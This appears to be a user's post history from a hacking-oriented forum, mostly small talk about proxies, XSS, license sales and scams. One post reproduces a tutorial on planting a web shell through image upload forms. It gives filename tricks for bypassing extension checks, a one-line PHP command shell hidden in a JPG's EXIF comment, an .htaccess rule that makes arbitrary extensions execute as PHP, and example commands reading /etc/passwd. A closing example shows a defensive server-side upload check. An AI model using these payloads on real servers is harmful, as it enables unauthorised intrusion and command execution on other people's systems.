Everything posted by gafi

  1. http://i.imgur.com/YO9MUXc.jpg
  2. I propose that those who have 15-20 posts should not be able to open a thread; there should be no new thread button for them. There are a lot of people who just register and post all kinds of stupid requests, kids who don't search Google first and open a thread because it's easier that way, spoon-fed. Learn, do your research, work!!!! EDIT: hahaha, thanks for the correction!
  3. Off: I'm curious what the program does; if you want, tell me here or by PM. ON: Use Fiddler2, search the net for how to use it, and see if it helps you with anything. If it checks the license online, then this program will help you, I hope.
  4. Even the gypsies have money! You're absolutely right, live your fucking life!!!!
  5. How much money do you want to spend per month on proxies, and what do you want to do with them? To me, LimeProxies | Premium Private Proxies | Proxy Solutions seem ideal, but they are also more expensive. They are very fast and are not spammed.
  6. Those who know how to run the scam and don't pose as hackers don't brag, rest assured; they make their money quietly without anyone knowing them. These guys are just losers with 10 grades of schooling. Too much off-topic on this thread, a lot of content without quality.
  7. Well, you can do a single SQL query instead of 2, and how well do you know MySQL? Otherwise I don't see what else you can do!
  8. I'm curious what methods you use to avoid an XSS + SQLi attack. I use htmlentities, mysql_escape_string, stripslashes, htmlspecialchars. Maybe I've missed something; it depends from site to site anyway, and on what queries I run. I was thinking that a complex function that includes all the PHP functions for filtering XSS or SQLi could slow down a site. I'm curious what you use as well?
  9. Selling CLADG PRO (2 licenses) for $500. Thank you
  10. Very nice, well done. May your marriage be rock solid!
  11. gafi

    XSS Yahoo

    Can you take a screenshot with t= ? Well done!
  12. gafi

    Help

    XSS tutorial - learn HTML + JavaScript well. The rest has to come from your own mind. What do you want to "hack"?
  13. During a website audit, upload forms and other interactive 'user-content' driven facilities are often found to be protected by client side and/or server side security checks. This tutorial presents the methods that can be used to circumvent these security checks. In this case we're specifically considering image uploads that allow JPG files in particular. Each security measure numbered below will be briefly discussed and paired with an appropriate bypass method; this tutorial aims to provide a complete'ish solution.

    1. Client side file verification (with Javascript and/or HTML attributes)

        <input name="fileToUpload" type="file" onchange="check_file()" >

        if($_FILES['userfile']['type'] != "image/jpg")

    The bypass is trivial: simply rename your shell with an allowed extension/content type by editing the request header data with an intercepting proxy. I like burp, but the FF Tamper Data add-on is great too.

    2. A white-list of file extensions is in place so that anything that isn't a picture is DENIED:

        $valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png");

    Often there will then be some sort of string manipulation to determine the file name and extension of an uploaded file. The strength of this code will determine whether one of the following bypasses will work. Functions like 'strrchr' shown below may play a part in this process and may be passable given a little bit of imagination!

        $file_extension = strrchr($_FILES["file"]["name"], ".");

    Here is a list of bypasses:

      • shell.jpg.php (satisfies a check for jpg only)
      • shell.jpg.PhP (obfuscation)
      • shell.php;.jpg (sometimes can ignore what's after ";")
      • shell.php.jpg (the infamous NULL byte which comments out trailing text)
      • shell.php.test (defaults to first recognised extension ignoring "test")
      • shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)
      • .phtml (a commonly used php parsed extension often forgotten about!)
      • .php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)

    3. Perform further checks once uploaded to make sure it is a REAL image:

        $imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

    The function getimagesize() effectively confirms whether the uploaded file is an image or not. At this point, all the other methods will fail (there are other functions that can be used with a similar goal such as checking image dimensions). The only foolproof solution is to actually upload a real image which will actually pass these checks rather than trying to bypass them.

    We turn to the trusty JPG file as our example image. There is an amazing amount of information that can be stored in a jpg file alongside the actual image data. EXIF 'meta' data such as the camera model the image was taken on, image descriptions, and comments are editable with programs such as GIMP and even a hex editor. For purposes of this tutorial I use Exif Pilot.

    Create a small image (avatar size) in MSPaint (white background). We can use Exif Pilot to open/edit the file and edit the Exif data, inserting our PHP code into the 'comment' section. See the pic below; I am using my generic 'tiny shell' code to allow me to pass shell commands to the server on the fly.

    code:

        <?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?>

    Now we can upload the jpg file using an extension bypass shown earlier, and it will pass the real image check. To run commands on the server, usage would be:

        website.com/shell.jpg.php?r0ng=cat /etc/passwd

    4. Found an extension that will upload but it's not valid PHP...

    Upload an .htaccess file which sets an arbitrary file extension to be processed as php. If there is already an .htaccess file in the image upload directory this should be automatically overwritten. Create a .htaccess file and put the following code, then upload it (replace .mp3 with whatever extension passed).

        AddType application/x-httpd-php .mp3

    Upload your shell as shell.mp3. Then access as:

        website.com/shell.mp3?r0ng=cat /etc/passwd

    Source: http://hackers2devnull.blogspot.com/2013/05/how-to-shell-server-via-image-upload.html
  14. I don't want the Steam account
  15. One form, 2 iframes; see if what you have here helps: php - Two different actions on form submit - Stack Overflow. A few modifications and that's it.
  16. He wasn't making very much money, guaranteed. You need to have something very well organized to make money, and quickly, in 1-2 days; errors like this get detected fast if you abuse them.
  17. Very very easy.
  18. I'm curious what syntax you used. I'm a beginner with XSS but I'm working hard; if you'd be kind enough to PM me your syntax, it would be a great help for my learning. Good luck!
  19. I wanted to say the same thing too: it is htmlentities(mysql_escape_string()); But maybe we're wrong. Would you post the custom function, please? I'm curious!
  20. gafi

    RO Traffic

    I had no bad intentions, nor did I want you to prove anything to me; I just wanted to see what niche the sites are in, I was going to give you some advice. Next time be wiser and not cocky; it will help you more. Good luck
  21. gafi

    RO Traffic

    Show us a site so we can give you solutions
  22. gafi

    Paying the CEZ bill

    I pay with BRD online!
  23. I use it too; a very useful program for those who work with many programs open at once!
  24. Thank you, albertynos :-bd
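
The four upload checks walked through in post 13 above, seen from the server side, as an added example that is not part of the original post or the linked blog: a handler that ignores the client-supplied name and type, so none of the listed filename or .htaccess variants reach the filesystem. The function name store_uploaded_jpeg and the storage path are hypothetical; the fileinfo and GD extensions are assumed to be enabled.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper (added example): accept a JPEG upload without trusting
 * anything the client controls. $storageDir is assumed to be outside the web
 * root, or served with PHP execution disabled.
 */
function store_uploaded_jpeg(array $file, string $storageDir): string
{
    // Reject failed uploads and paths that did not come from PHP's upload mechanism.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }

    // $file['type'] and $file['name'] are request data; detect the type from the bytes.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'image/jpeg') {
        throw new RuntimeException('not a JPEG');
    }

    // Decode the pixels. A file that only carries a valid header fails here.
    $image = @imagecreatefromjpeg($file['tmp_name']);
    if ($image === false) {
        throw new RuntimeException('image could not be decoded');
    }

    // Server-chosen name with a fixed extension: double extensions, mixed
    // case, ';' tricks and an uploaded .htaccess never become file names.
    $target = rtrim($storageDir, '/') . '/' . bin2hex(random_bytes(16)) . '.jpg';

    // Re-encode from the decoded pixels. GD writes a new file, so EXIF fields
    // and comment segments of the upload are not copied over. This is defence
    // in depth; the fixed name and non-executable storage are the main control.
    if (!imagejpeg($image, $target, 90)) {
        throw new RuntimeException('could not write image');
    }
    chmod($target, 0644);

    return $target;
}

// Usage inside an upload endpoint (path is a constructed placeholder):
// $path = store_uploaded_jpeg($_FILES['userfile'], '/var/uploads/avatars');
```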